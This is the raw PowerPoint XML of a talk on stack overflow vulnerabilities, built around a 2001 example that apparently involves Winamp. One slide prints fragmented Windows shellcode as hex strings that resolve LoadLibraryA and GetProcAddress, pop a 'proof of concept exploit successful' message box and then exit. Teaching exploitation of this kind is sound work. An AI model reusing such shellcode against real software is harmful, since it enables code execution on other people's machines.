              <a:t> execution flow can go to code provided in the overflowing buffer itself (the “shellcode”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="ο"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> arbitrary code execution is possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="ο"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> remote code execution (“RCE”) vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632616" y="194873"/>
            <a:ext cx="11055373" cy="1199213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack overflow vulnerabilities: a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>hello^H^Hp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> world!”          </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>example (2001)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9363464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43986" y="365773"/>
            <a:ext cx="10358205" cy="1096963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack overflow vulnerabilities: a “help wooo … ooorld!”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>example (2001)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">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3075743" y="1697725"/>
            <a:ext cx="5349422" cy="4552215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D256DB5C-47EB-4920-9081-CBB647E70E52}"/>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772" b="89474" l="2381" r="94048">
                        <a14:foregroundMark x1="12500" y1="41228" x2="8929" y2="84211"/>
                        <a14:foregroundMark x1="8929" y1="84211" x2="33333" y2="70175"/>
                        <a14:foregroundMark x1="90179" y1="60526" x2="84524" y2="22807"/>
                        <a14:foregroundMark x1="91667" y1="20175" x2="89583" y2="52632"/>
                        <a14:foregroundMark x1="2381" y1="42982" x2="11905" y2="67544"/>
                        <a14:foregroundMark x1="93155" y1="25439" x2="94048" y2="59649"/>
                        <a14:foregroundMark x1="71131" y1="65789" x2="43452" y2="76316"/>
                        <a14:foregroundMark x1="43750" y1="73684" x2="28571" y2="77193"/>
                        <a14:foregroundMark x1="28571" y1="77193" x2="26488" y2="79825"/>
                        <a14:foregroundMark x1="32143" y1="78070" x2="15179" y2="79825"/>
                        <a14:foregroundMark x1="22917" y1="80702" x2="2976" y2="85088"/>
                        <a14:foregroundMark x1="29927" y1="30009" x2="48512" y2="30702"/>
                        <a14:foregroundMark x1="6845" y1="38596" x2="22311" y2="32899"/>
                        <a14:foregroundMark x1="40179" y1="30702" x2="72024" y2="19298"/>
                        <a14:foregroundMark x1="67857" y1="20175" x2="79167" y2="21930"/>
                        <a14:foregroundMark x1="82143" y1="17544" x2="77083" y2="19298"/>
                        <a14:foregroundMark x1="74405" y1="17544" x2="52976" y2="32456"/>
                        <a14:foregroundMark x1="2381" y1="46491" x2="4167" y2="63158"/>
                        <a14:foregroundMark x1="2976" y1="41228" x2="21778" y2="35606"/>
                        <a14:backgroundMark x1="22917" y1="29825" x2="30655" y2="26316"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:sharpenSoften amount="50000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1107561">
            <a:off x="4963046" y="1340958"/>
            <a:ext cx="4196261" cy="1423731"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19513855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00496" y="527463"/>
            <a:ext cx="11245850" cy="730440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack overflow vulnerabilities: shellcode </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>example (2001)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757253" y="1345310"/>
            <a:ext cx="10566263" cy="4862870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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"\x8B\x35" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LoadLibraryA</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"\x8B\x3D" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetProcAddress</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"\x55""\x66\x68""32""\x68""USER"</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"\x54"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\xD6"</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"\x6A""A""\x66\x68""ox""\x68""ageB""\x68""Mess"</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"\x54"</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"\x50"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\xD7"</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"\x55""\x68""ING!""\x68""WARN"</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"\x8B\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xDC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</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"\x55""\x6A""!""\x68""full""\x68""cces""\x68""t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>""\x68""ploi"</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"\x68""t ex""\x68""ncep""\x68""f co""\x68""of o""\x68"" pro"</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"\x68""2.7x""\x68"".6x/""\x68""mp 2""\x68""Wina"</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"\x8B\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</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 </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"\x6A\x30"</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"\x53"</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"\x51"</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"\x55"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\xD0"</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 </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"\x55""\x68""EL32""\x68""KERN"</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"\x54"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\xD6"</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"\x6A""s""\x66\x68""es""\x68""Proc""\x68""Exit"</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"\x54"</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"\x50"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\xD7"</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"\x55"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="90000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\xD0"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="90000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14342" name="Picture 6" descr="https://www.winamp.com/Assets/Images/lam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9977" y="1170496"/>
            <a:ext cx="5213644" cy="5037684"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 4" descr="https://external.fsof3-1.fna.fbcdn.net/safe_image.php?d=AQBgSUV29lJp1WMg&amp;w=540&amp;h=282&amp;url=https%3A%2F%2Fwww.ultimate-guitar.com%2Fstatic%2Farticle%2Fnews%2F2%2F80682_0_meta_ver1539870879.jpg&amp;cfs=1&amp;upscale=1&amp;fallback=news_d_placeholder_publisher&amp;_nc_hash=AQC9WU51l3zfJEA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2333" y="1345310"/>
            <a:ext cx="3925025" cy="204246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5E502CF-A67D-4276-A112-6CAD44A3C318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7817867" y="1345310"/>
            <a:ext cx="3925025" cy="2042467"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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73505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Theme">
  <a:themeElements>
    <a:clrScheme name="Custom 108">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="7C878E"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F7F7F7"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0099CC"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="333842"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FA6E1E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="D0D3D4"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="33CCFF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="99CC00"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0099CC"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="0099CC"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Custom 52">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sset_x0020_Type xmlns="aa441917-1175-4021-b9fd-482000b8cbec">PowerPoint Presentation Templates</Asset_x0020_Type>
    <IconOverlay xmlns="http://schemas.microsoft.com/sharepoint/v4" xsi:nil="true"/>
    <Year xmlns="aa441917-1175-4021-b9fd-482000b8cbec">
      <Value>2018</Value>
    </Year>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2449E0226D72C4EA871ED8E19223534" ma:contentTypeVersion="4" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="191438b9cd0a4d201158f04fe16ca7e4">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="aa441917-1175-4021-b9fd-482000b8cbec" xmlns:ns3="http://schemas.microsoft.com/sharepoint/v4" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="6f0c80f09bb6f241eb7a6e1c3659c6bc" ns2:_="" ns3:_="">
    <xsd:import namespace="aa441917-1175-4021-b9fd-482000b8cbec"/>
    <xsd:import namespace="http://schemas.microsoft.com/sharepoint/v4"/>
    <xsd:element name="properties">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element name="documentManagement">
            <xsd:complexType>
              <xsd:all>
                <xsd:element ref="ns2:Asset_x0020_Type" minOccurs="0"/>
                <xsd:element ref="ns2:Year" minOccurs="0"/>
                <xsd:element ref="ns3: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441917-1175-4021-b9fd-482000b8cbec" elementFormDefault="qualified">
    <xsd:import namespace="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <xsd:import namespace="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <xsd:element name="Asset_x0020_Type" ma:index="8" nillable="true" ma:displayName="Asset Type" ma:format="Dropdown" ma:internalName="Asset_x0020_Type">
      <xsd:simpleType>
        <xsd:restriction base="dms:Choice">
          <xsd:enumeration value="PowerPoint Presentation Templates"/>
          <xsd:enumeration value="MS Word Templates"/>
          <xsd:enumeration value="Verint Logos"/>
          <xsd:enumeration value="Electronic Letterhead"/>
          <xsd:enumeration value="Verint Icons"/>
          <xsd:enumeration value="Fact Sheets"/>
          <xsd:enumeration value="Verint Photos"/>
          <xsd:enumeration value="Outlook Templates (Mac and PC versions)"/>
          <xsd:enumeration value="Verint at a Glance"/>
          <xsd:enumeration value="Product Naming Documents"/>
          <xsd:enumeration value="Release Form"/>
          <xsd:enumeration value="Marketing/Legal Approval Form"/>
          <xsd:enumeration value="Verint Style Guide"/>
          <xsd:enumeration value="CES Product Naming Documents"/>
          <xsd:enumeration value="Color Palette"/>
          <xsd:enumeration value="Electronic Thank You Notes"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Year" ma:index="9" nillable="true" ma:displayName="Year" ma:default="2017" ma:internalName="Year">
      <xsd:complexType>
        <xsd:complexContent>
          <xsd:extension base="dms:MultiChoice">
            <xsd:sequence>
              <xsd:element name="Value" maxOccurs="unbounded" minOccurs="0" nillable="true">
                <xsd:simpleType>
                  <xsd:restriction base="dms:Choice">
                    <xsd:enumeration value="2014"/>
                    <xsd:enumeration value="2015"/>
                    <xsd:enumeration value="2016"/>
                    <xsd:enumeration value="2017"/>
                    <xsd:enumeration value="2018"/>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0"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9CECFB-A36B-4EA0-91A7-83096E6AB798}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5BBA567A-E8E1-468C-A273-988437713CE3}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v4"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="aa441917-1175-4021-b9fd-482000b8cbec"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A2EEF3D1-9327-4293-89E5-E189841CFD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441917-1175-4021-b9fd-482000b8cbec"/>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5560</TotalTime>
  <Words>1482</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>185</Paragraphs>
  <Slides>22</Slides>
  <Notes>14</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Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Montserrat Medium</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
